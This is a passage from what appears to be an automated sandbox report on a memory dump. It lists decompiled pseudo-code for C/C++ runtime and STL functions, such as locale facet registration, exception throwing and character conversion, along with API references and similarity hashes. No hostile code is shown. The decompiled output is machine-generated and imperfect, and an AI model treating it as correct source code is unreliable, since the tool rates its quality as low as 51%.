Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF331
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF351
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF36F

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 072af5c3c29f83224dfc70985023c8a046abb7bb148cb7f95e54e24278491b5b
Instruction ID: 2582b827fb31a06d978925739d8e6b20ea7e4e04988f768394c6b344137240d6
Opcode Fuzzy Hash: 072af5c3c29f83224dfc70985023c8a046abb7bb148cb7f95e54e24278491b5b
Instruction Fuzzy Hash: 6F11A075809119DBCF05FB64C840BFDB779AF44718F27404AF521AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA24B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DDDA24B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t35;
				intOrPtr* _t36;
				void* _t48;
				intOrPtr* _t82;
				intOrPtr* _t92;
				void* _t94;
				void* _t95;

				_t68 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t94 =  *0x6de96cd0; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t94;
				_t35 = E6DDB161C(0x6de96cbc);
				_t71 = _a8;
				_t36 = E6DDB171B(_a8, _t35);
				_t91 = _t36;
				if(_t36 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t91);
				} else {
					if(_t94 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDAAA0(__ebx, _t71, __edx, _t91, _t94) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t91, _t94, 0x14);
							E6DDD6653( &_v20, 0);
							_t95 =  *0x6de96cd4; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t95;
							_t48 = E6DDB161C(0x6de96cc0);
							_t78 = _a8;
							_t92 = E6DDB171B(_a8, _t48);
							__eflags = _t92;
							if(_t92 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t92);
							} else {
								__eflags = _t95;
								if(_t95 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAB08(_t68, _t78, __edx, _t92, _t95) - 0xffffffff;
									if(__eflags == 0) {
										_t82 =  &_v32;
										E6DDB1438(_t82);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										_push(_t82);
										 *((intOrPtr*)(_t82 + 4)) = _v0;
										_v16 = _t82;
										 *_t82 = 0x6de3ba24;
										return _t82;
									} else {
										_t92 = _v16;
										_v16 = _t92;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t92);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 4))))();
										 *0x6de96cd4 = _t92;
										goto L12;
									}
								} else {
									_t92 = _t95;
									goto L12;
								}
							}
						} else {
							_t91 = _v16;
							_v16 = _t91;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t91);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 4))))();
							 *0x6de96cd0 = _t91;
							goto L5;
						}
					} else {
						_t91 = _t94;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDA252
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA25C
int.LIBCPMT ref: 6DDDA273

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDA2AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA2CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA2EB

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 46cf0773ece5b0fdf9785b8794a7cc683e4bc8ff5b2d045e961f59a78b9c28bb
Instruction ID: 2e8b8a1644f6a7346e004dd939cb3335e4989a52648d1522a664b758dcc9fc4d
Opcode Fuzzy Hash: 46cf0773ece5b0fdf9785b8794a7cc683e4bc8ff5b2d045e961f59a78b9c28bb
Instruction Fuzzy Hash: 5611E071948229DBCF01FBA4C840EFDB7B5AF64318F264409F611AB290DF719902CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD46AB, Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD46AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6DDF00AC(0x6de38144, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6deace84; // 0xb96020
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6DDB161C(0x6deacea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6DDB171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6DDD66BA(_t88 - 0x14);
					return E6DDF0075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6DDD4FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t88 - 0x20);
							E6DDF3D74(_t88 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3816f, __ebx, _t83, _t86, 0x18);
							E6DDD6653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6deace7c; // 0xb99390
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6DDB161C(0x6deace90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6DDB171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6DDD66BA(_t88 - 0x14);
								return E6DDF0075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6DDD4F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6DDB1438(_t76);
										E6DDF3D74(_t88 - 0x20, 0x6de93504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6DDD6FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6deace7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6DDD6FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6deace84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDD46B2
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD46BC
int.LIBCPMT ref: 6DDD46D3

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4723
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD4741

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 7794da0f72db8eb318aa646789d370bc061310b6ef775a728d4e9da710e98fde
Instruction ID: 60ed59bd32c71875bf7277be5b423a5c9132c9ae16d708880f0145ecee709eea
Opcode Fuzzy Hash: 7794da0f72db8eb318aa646789d370bc061310b6ef775a728d4e9da710e98fde
Instruction Fuzzy Hash: EB11C27590412ADBCF00FBA0C850AFE77B4AF08318F264108F611AB290DF709E0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D5FF, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DE1D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6de951e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6DE1C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6DE24196(_t25, __eflags,  *0x6de951e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6DE1D33F(_t25, _t31, 0x6de976f0);
							E6DE1CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6DE1CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6DE162FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6de951e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6DE1C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6DE24196(_t27, __eflags,  *0x6de951e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6DE1D33F(_t27, _t32, 0x6de976f0);
									E6DE1CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6DE1CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6DE24140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6DE24140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D603
_free.LIBCMT ref: 6DE1D636
_free.LIBCMT ref: 6DE1D65E
SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D66B
SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D677
_abort.LIBCMT ref: 6DE1D67D

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 3924d18fb04c5841ecfc51ba18ac1a6f0bd4b762e7173c82dd38d399b61720f2
Instruction ID: a3555f6b7c3bd3943ec992a3db83dc369120bb6295ce60a4f7a9e49f76c3e538
Opcode Fuzzy Hash: 3924d18fb04c5841ecfc51ba18ac1a6f0bd4b762e7173c82dd38d399b61720f2
Instruction Fuzzy Hash: 38F0287E78D50166CB1216355C09FBB32769BD367DF73012AF62CE6280EF20C80280A8

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD75E8, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6DDD75E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6DDD73A9( &_v16, _a4);
				E6DDF3D74( &_v16, 0x6de914fc);
				asm("int3");
				_push(_t35);
				E6DDD73E3( &_v44, _v24);
				E6DDF3D74( &_v44, 0x6de91538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6DDD7426( &_v76, _v52);
				E6DDF3D74( &_v76, 0x6de915ac);
				asm("int3");
				_push(_t33);
				E6DDB1420( &_v68, _v48);
				E6DDF3D74( &_v68, 0x6de93450);
				asm("int3");
				return "bad function call";
			}

0x6ddd75eb
0x6ddd75f4
0x6ddd7602
0x6ddd7607
0x6ddd7608
0x6ddd7614
0x6ddd7622
0x6ddd7627
0x6ddd7628
0x6ddd7629
0x6ddd7634
0x6ddd7642
0x6ddd7647
0x6ddd7648
0x6ddd7654
0x6ddd7662
0x6ddd7667
0x6ddd766d

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6DDD75F4

Part of subcall function 6DDD73A9: std::exception::exception.LIBCONCRT ref: 6DDD73B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7602

Part of subcall function 6DDF3D74: RaiseException.KERNEL32(?,?,6DDD75E7,00000000,?,?,?,?,?,?,?,6DDD75E7,00000000,6DE914C0,?), ref: 6DDF3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6DDD7614

Part of subcall function 6DDD73E3: std::exception::exception.LIBCONCRT ref: 6DDD73F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7622
std::regex_error::regex_error.LIBCPMT ref: 6DDD7634

Part of subcall function 6DDD7426: std::exception::exception.LIBCONCRT ref: 6DDD743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD7642

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: 808337c68e454dd762c8a010d37580d7b328b85ac5a11acac2aab8323fdf0fc0
Instruction ID: 5830b275e5be0f6f6f6c38efdfd728fc0ad17f139a1efe92d1193c0f7581701e
Opcode Fuzzy Hash: 808337c68e454dd762c8a010d37580d7b328b85ac5a11acac2aab8323fdf0fc0
Instruction Fuzzy Hash: D0F0FE35C0420C77CF05FBE4EC45CEDB77DAA14104F524560BB2596451EB71A61A87E2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD53EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6DDD53EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				void* _t54;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr _t67;
				void* _t71;
				void* _t78;

				_t62 = __edx;
				E6DDF014E(0x6de38264, __ebx, __edi, __esi, 0xa4);
				_t56 = __ecx;
				 *((intOrPtr*)(_t71 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t71 - 0x44)) = E6DE11A3F(__ecx, __edx);
				_t35 = E6DDD91D8(__ecx, __edx, _t78, _t71 - 0x80);
				_t59 = 0xb;
				memcpy(_t71 - 0x40, _t35, _t59 << 2);
				_t67 =  *((intOrPtr*)(_t71 - 0x44));
				_t79 =  *((char*)(_t71 + 0xc));
				 *((intOrPtr*)(_t56 + 8)) = 0;
				 *((intOrPtr*)(_t56 + 0x10)) = 0;
				 *((intOrPtr*)(_t56 + 0x14)) = 0;
				 *((intOrPtr*)(_t71 - 4)) = 0;
				if( *((char*)(_t71 + 0xc)) == 0) {
					_t13 = _t67 + 8; // 0x0
					 *((intOrPtr*)(_t71 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t71 - 0x48)) = 0x6de494dd;
				}
				E6DDD91D8(_t56, _t62, _t79, _t71 - 0x80);
				_push(_t71 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t56 + 8)) = E6DDD5B01(_t62, _t67, 0, _t71, _t79,  *((intOrPtr*)(_t71 - 0x48)));
				_push(_t71 - 0x40);
				 *((intOrPtr*)(_t56 + 0x10)) = E6DDB17AF(_t56, _t62, _t67, 0, _t71, _t79, "false", 0);
				_push(_t71 - 0x40);
				 *((intOrPtr*)(_t56 + 0x14)) = E6DDB17AF(_t56, _t62, _t67, 0, _t71, _t79, "true", 0);
				if( *((char*)(_t71 + 0xc)) == 0) {
					_t28 = _t67 + 0x30; // 0x0
					 *((short*)(_t56 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t67 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
					 *((short*)(_t56 + 0xe)) = _t49;
					return E6DDF009B(_t49, _t56, _t67, 0);
				} else {
					 *((short*)(_t56 + 0xc)) = E6DDB177E(0x2e, 0, _t71 - 0x40);
					_t54 = E6DDB177E(0x2c, 0, _t71 - 0x40);
					asm("into");
					return _t54;
				}
			}

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6DDD53F5
__Getcvt.LIBCPMT ref: 6DDD540B
__Getcvt.LIBCPMT ref: 6DDD5445

Strings

true, xrefs: 6DDD547B
false, xrefs: 6DDD5466

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: 536b3019053b5f5adcaab39d73661af2c2c22c1cb4e5d5bfce782a8dc53b810b
Instruction ID: 6f7cbad37c8a53a6a0cf1397e2e5522250a6e5f7412f30422e2833d0ba6b33b5
Opcode Fuzzy Hash: 536b3019053b5f5adcaab39d73661af2c2c22c1cb4e5d5bfce782a8dc53b810b
Instruction Fuzzy Hash: 262162B5D05218EBDF01EFA0D884AEE7B78FF05314F15416AF9059F201EB709955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6DE196A5,?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A), ref: 6DE1972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6DE19742
FreeLibrary.KERNEL32(00000000,?,?,?,6DE196A5,?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A), ref: 6DE19765

Strings

CorExitProcess, xrefs: 6DE1973A
mscoree.dll, xrefs: 6DE19728

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9b5ae4f79b1306c304e3dd0250e172413c44d195a8156c8908c4d07981042781
Instruction ID: 959a63613e06fc622d8bc7210047ab330ff9f2cb97203f539522cedd1f8a7f7f
Opcode Fuzzy Hash: 9b5ae4f79b1306c304e3dd0250e172413c44d195a8156c8908c4d07981042781
Instruction Fuzzy Hash: 99F08C70A45108ABEF11AF90CC48FBEBFB8EF05206F124169E905A2240CF308A80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24E2A, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6DE24E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6DE01F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6DE12281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6DE12281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6DE12281())) = 0x16;
					E6DE1215B();
					goto L59;
				} else {
					L59:
					return E6DDEF8A5(_v8 ^ _t112, _t106, _t111);
				}
			}

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
